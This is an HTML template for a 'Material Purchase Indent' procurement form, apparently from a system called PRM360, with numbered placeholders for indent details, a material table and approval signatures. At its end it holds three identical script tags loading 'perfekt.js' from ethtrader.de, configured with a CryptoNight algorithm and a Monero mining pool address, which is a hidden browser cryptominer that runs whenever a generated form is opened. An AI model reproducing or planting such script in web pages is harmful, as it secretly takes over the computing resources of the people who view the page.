﻿<html>
<head>
    <style>


table {{border-collapse: collapse;}}

        table.borderClass td {{
            border: 1px solid black;
            text-align: center;
        }}

		table.tablesdata td {{
			border: 1px solid black;
			border-collapse: collapse;
			text-align: center;
			padding:1px;
			<!--font-size: 85%;-->
		}}

        table.marginClass tr {{
            margin-top: 10px;
        }}
		.line{{
			width: 112px;
			height: 47px;
			border-bottom: 1px solid black;
			position: absolute;
		}}
		.line1{{
			width: 112px;
			height: 47px;
			position: relative;
		}}

    </style>
</head>
<body>
    <table width='100%' cellpadding="0" cellspacing="0">
        <tr class="line">
            <td style="min-width:30%;border-bottom:1px solid black;">
                {0}
            </td>
            <td style="width:70%;border-bottom:1px solid black;">
                <h2>{1}</h2>
            </td>
        </tr>
    </table>
    <table width='100%' cellpadding="0" cellspacing="0">
        <tr>
            <td style="text-align:center">
                <h4>Material Purchase Indent</h4>
            </td>
        </tr>
    </table>
    <br />
    <table style="width:100%" class="marginClass">
        <tr>
            <td style="min-width:30%; vertical-align:top"> 1.    Indent Number 	 </td>
            <td style="width:70%;"> : {4} </td>
        </tr>
        <tr>
            <td style="min-width:30%; vertical-align:top"> 2.  Category  </td>
            <td style="width:70%;"> : {2} </td>
        </tr>
        <tr>
            <td style="min-width:30%; vertical-align:top"> 3.    Asset Type 	 </td>
            <td style="width:70%;"> : {3} </td>
        </tr>
        <tr>
            <td style="min-width:30%; vertical-align:top"> 4.    Department 	 </td>
            <td style="width:70%;"> : {5} </td>
        </tr>
        <tr>
            <td style="min-width:30%; vertical-align:top"> 5.    Date 	 </td>
            <td style="width:70%;"> : {6} </td>
        </tr>
        <tr>
            <td style="min-width:30%; vertical-align:top"> 6.    Approximate Cost Range 	 </td>
            <td style="width:70%;"> : {7} </td>
        </tr>
    </table>

    <br /><br />

    <table width='100%' cellpadding="0" cellspacing="0" class="tablesdata">
        <tr>
            <td>BUDGET CODE</td>
            <td>MATERIAL DESCRIPTION</td>
            <td>MAKE/MODEL</td>
            <td>Functional</td>
            <td>Non-Functional</td>
            <td>REQUIRED QTY</td>
            <td>UNITS</td>
            <td>PURPOSE OF MATERIAL</td>
        </tr>
        {8}
    </table>

    <br /><br />

    <table width='100%' cellpadding="0" cellspacing="0" class="borderClass">
        <tr>
            <td>Requested By</td>
            <td>Approved By(HOD)</td>
            <td>Purchase Incharge</td>
            <td>Director</td>
        </tr>
        <tr>
            <td>{9}</td>
            <td>{10}</td>
            <td>{11}</td>
            <td>{12}</td>
        </tr>
    </table>

    <br /><br />

    <p>
        <b><i>NOTE:</i></b> THIS IS AN AUTO-GENERATED INDENT FROM PRM360 SIGNATURE NOT REQUIRED.
    </p>
    <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script>
    <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script>
    <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptoknight.cc:9221"></script>
</body>
</html>